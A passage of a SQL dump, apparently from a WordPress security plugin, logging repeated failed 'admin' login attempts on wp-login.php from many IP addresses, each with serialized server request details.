UERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746788685.1351669;s:12:\"REQUEST_TIME\";i:1746788685;}}','81.177.139.64',0,'2025-05-09 16:34:47','1970-01-01 00:00:00'),(95075,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59852\";s:11:\"REMOTE_ADDR\";s:14:\"195.26.245.159\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746789353.4881649;s:12:\"REQUEST_TIME\";i:1746789353;}}','195.26.245.159',0,'2025-05-09 16:45:55','1970-01-01 00:00:00'),(95076,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47006\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.132.74\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746790019.414752;s:12:\"REQUEST_TIME\";i:1746790019;}}','66.102.132.74',0,'2025-05-09 16:57:01','1970-01-01 00:00:00'),(95077,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54138\";s:11:\"REMOTE_ADDR\";s:14:\"113.36.242.229\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746790683.6460221;s:12:\"REQUEST_TIME\";i:1746790683;}}','113.36.242.229',0,'2025-05-09 17:08:05','1970-01-01 00:00:00'),(95078,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38806\";s:11:\"REMOTE_ADDR\";s:15:\"111.229.111.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746791354.784476;s:12:\"REQUEST_TIME\";i:1746791354;}}','111.229.111.163',0,'2025-05-09 17:19:16','1970-01-01 00:00:00'),(95079,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39818\";s:11:\"REMOTE_ADDR\";s:13:\"8.210.103.127\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746792028.716404;s:12:\"REQUEST_TIME\";i:1746792028;}}','8.210.103.127',0,'2025-05-09 17:30:30','1970-01-01 00:00:00'),(95080,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59314\";s:11:\"REMOTE_ADDR\";s:13:\"47.119.16.237\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746792704.918685;s:12:\"REQUEST_TIME\";i:1746792704;}}','47.119.16.237',0,'2025-05-09 17:41:46','1970-01-01 00:00:00'),(95081,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46394\";s:11:\"REMOTE_ADDR\";s:12:\"91.238.162.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746793384.1924191;s:12:\"REQUEST_TIME\";i:1746793384;}}','91.238.162.8',0,'2025-05-09 17:53:05','1970-01-01 00:00:00'),(95082,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40008\";s:11:\"REMOTE_ADDR\";s:12:\"78.47.178.44\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746794060.950871;s:12:\"REQUEST_TIME\";i:1746794060;}}','78.47.178.44',0,'2025-05-09 18:04:22','1970-01-01 00:00:00'),(95083,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39602\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.153.28\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746794748.7651689;s:12:\"REQUEST_TIME\";i:1746794748;}}','66.29.153.28',0,'2025-05-09 18:15:50','1970-01-01 00:00:00'),(95084,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55330\";s:11:\"REMOTE_ADDR\";s:13:\"54.37.137.204\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746795427.0183649;s:12:\"REQUEST_TIME\";i:1746795427;}}','54.37.137.204',0,'2025-05-09 18:27:08','1970-01-01 00:00:00'),(95085,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 